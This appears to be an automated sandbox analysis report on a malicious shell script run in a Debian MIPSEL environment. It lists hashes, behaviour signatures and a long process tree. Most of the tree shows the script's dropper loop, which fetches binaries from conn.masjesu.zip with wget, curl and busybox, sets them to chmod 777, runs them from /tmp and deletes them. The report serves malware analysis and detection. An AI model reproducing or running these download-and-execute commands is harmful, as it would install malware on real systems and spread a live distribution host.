Analysis
-
max time kernel
129s -
max time network
132s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
-
Size
10KB
-
MD5
3ef72a961095a0472a5f608928d2c772
-
SHA1
dc7795456334779680f17d1fd318e7026431bbcc
-
SHA256
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2
-
SHA512
2deda53f3c8abdc9a80c6dccb0cdbf3e089b0f1e8a36747d4a07db5b4c153cfaa6a3e4ee1372ed7319b9b560faf35002fdbcca1033261b85ade67f2b68484c4a
-
SSDEEP
192:u7XDK1NRwo+TE7aAAfGXsQNqi3Ey0AAfGHsQNqiGXDK1NJ:u7XDK1NRwo+o7aAAfGFEtAAfGMXDK1NJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:706
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:729
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:733
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:734
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:780
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:782
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:792
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:793
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:864
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:878
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:885
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:892
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:934
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:955
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:958
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:959
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:976
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:983
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:986
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:987
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:990
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:993
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:994
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:997
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:998
-
-
